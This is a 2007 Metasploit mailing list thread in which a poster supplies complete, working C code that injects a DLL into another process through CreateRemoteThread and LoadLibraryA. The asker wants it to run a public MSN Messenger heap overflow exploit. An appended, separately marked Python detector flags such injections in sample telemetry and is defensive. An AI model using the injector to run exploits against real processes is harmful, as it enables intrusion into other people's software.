Metasploit mailing list archives
DLL Process Injection
From: danuxx at gmail.com (Danux)
Date: Fri, 14 Sep 2007 14:44:05 -0500
Wonderfulllllllll!!!! That's what I was looking for. Thanks, friends.

On 9/14/07, Pusscat <pusscat at metasploit.com> wrote:

Try this:

    #include <windows.h>
    #include <stdlib.h>
    #include <stdio.h>

    int main(int argc, char **argv)
    {
        DWORD pid;
        HANDLE processHandle = NULL;
        HANDLE threadHandle = NULL;
        LPVOID stringAddress = NULL;
        LPCSTR dllName = NULL;
        SIZE_T dllNameLen;
        LPTHREAD_START_ROUTINE loadLibrary;

        if (argc < 3) {
            printf("injectDLL <dll to inject> <pid to inject into>\n\n");
            return (0);
        }

        pid = strtoul(argv[2], NULL, 10);
        dllName = argv[1];
        dllNameLen = strlen(dllName) + 1;   /* include the terminating NUL */
        printf("Injecting DLL %s into pid %lu... ", dllName, pid);

        if (!(processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))) {
            printf("OpenProcess() failed\n");
            return (-1);
        }

        /* Reserve and commit a buffer in the target for the DLL path string.
           A string only needs to be readable, so no execute permission. */
        if (!(stringAddress = VirtualAllocEx(processHandle, NULL, dllNameLen,
                                             MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) {
            printf("VirtualAllocEx() failed.\n");
            CloseHandle(processHandle);
            return (-1);
        }

        if (!WriteProcessMemory(processHandle, stringAddress, dllName, dllNameLen, NULL)) {
            printf("WriteProcessMemory() failed.\n");
            VirtualFreeEx(processHandle, stringAddress, 0, MEM_RELEASE);
            CloseHandle(processHandle);
            return (-1);
        }

        /* kernel32.dll is in practice mapped at the same base in every process,
           so the local address of LoadLibraryA is also valid in the target. */
        loadLibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(
                          GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

        /* Start a thread in the target whose entry point is LoadLibraryA and
           whose single argument is the DLL path we just wrote. */
        if (!(threadHandle = CreateRemoteThread(processHandle, NULL, 0, loadLibrary,
                                                stringAddress, 0, NULL))) {
            printf("CreateRemoteThread() failed.\n");
            VirtualFreeEx(processHandle, stringAddress, 0, MEM_RELEASE);
            CloseHandle(processHandle);
            return (-1);
        }

        /* Wait for LoadLibraryA to return before freeing the path buffer. */
        WaitForSingleObject(threadHandle, INFINITE);
        VirtualFreeEx(processHandle, stringAddress, 0, MEM_RELEASE);
        printf("DLL injected.\n");

        CloseHandle(threadHandle);
        CloseHandle(processHandle);
        return (0);
    }

~ Puss

-----Original Message-----
From: Danux [mailto:danuxx at gmail.com]
Sent: Friday, September 14, 2007 1:24 PM
To: framework at metasploit.com
Subject: [framework] DLL Process Injection

Hi, I don't know if this is the right place to ask, but I know you have the skill to help me. Recently I was trying to reproduce a new exploit, I mean: MSN Messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit. But following the instructions on milw0rm: http://www.milw0rm.com/sploits/08292007-exp_msn.rar they say I need to "inject the dll to msn messenger .... process". I know Metasploit already works that way, but I would like to learn how to do it manually. I have no skill in DLL programming nor injection; do you have a tutorial or something like that to understand it? Thanks in advance.

-- Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com

-- Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
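Added example (not from the thread or any of its posters): the defender's view of the technique above. The injector's footprint is a remote thread whose start routine is LoadLibraryA, so a simple detection pass over CreateRemoteThread telemetry can flag it. The records below are constructed sample data in a simplified key=value form using Sysmon Event ID 8 field names; the pipe-delimited layout and the allowlist are assumptions of this example, not a real log format.

```python
from typing import Dict, Iterable, List

# Thread start routines characteristic of LoadLibrary-based injection: the
# remote thread is started directly on LoadLibrary* with the DLL path as arg.
LOADLIB_FUNCS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

# Constructed sample records (not real telemetry), one per line, modelled on
# Sysmon Event ID 8 (CreateRemoteThread) fields in an assumed key=value form.
SAMPLE_EVENTS = """\
EventID=8|SourceImage=C:\\Tools\\injectDLL.exe|TargetImage=C:\\Program Files\\MSN Messenger\\msnmsgr.exe|StartModule=C:\\Windows\\System32\\kernel32.dll|StartFunction=LoadLibraryA
EventID=8|SourceImage=C:\\Windows\\System32\\csrss.exe|TargetImage=C:\\Windows\\explorer.exe|StartModule=C:\\Windows\\System32\\ntdll.dll|StartFunction=RtlUserThreadStart
EventID=1|SourceImage=C:\\Tools\\injectDLL.exe|TargetImage=|StartModule=|StartFunction=
EventID=8|SourceImage=C:\\Program Files\\Debugger\\dbg.exe|TargetImage=C:\\app\\target.exe|StartModule=C:\\Windows\\System32\\kernel32.dll|StartFunction=LoadLibraryW
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value|key=value' record into a field dictionary."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_loadlibrary_injection(ev: Dict[str, str], allowlist: Iterable[str] = ()) -> bool:
    """True for a CreateRemoteThread event whose thread starts on LoadLibrary*,
    unless the source process is on the (assumed) allowlist of known tools."""
    if ev.get("EventID") != "8":
        return False
    if ev.get("StartFunction") not in LOADLIB_FUNCS:
        return False
    allowed = {a.lower() for a in allowlist}
    return ev.get("SourceImage", "").lower() not in allowed


def find_injections(log: str, allowlist: Iterable[str] = ()) -> List[Dict[str, str]]:
    """Return every record in the log that matches the injection pattern."""
    hits = []
    for line in log.splitlines():
        if line.strip():
            ev = parse_event(line)
            if is_loadlibrary_injection(ev, allowlist):
                hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in find_injections(SAMPLE_EVENTS, allowlist=["C:\\Program Files\\Debugger\\dbg.exe"]):
        print(f"{ev['SourceImage']} -> {ev['TargetImage']} via {ev['StartFunction']}")
```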
Current thread:
- DLL Process Injection Danux (Sep 14)
- DLL Process Injection H D Moore (Sep 14)
- DLL Process Injection Pusscat (Sep 14)
- DLL Process Injection Danux (Sep 14)
- <Possible follow-ups>
- DLL Process Injection Michael Brandt asmael () att net (Sep 14)
- Fwd: Re: DLL Process Injection H D Moore (Sep 14)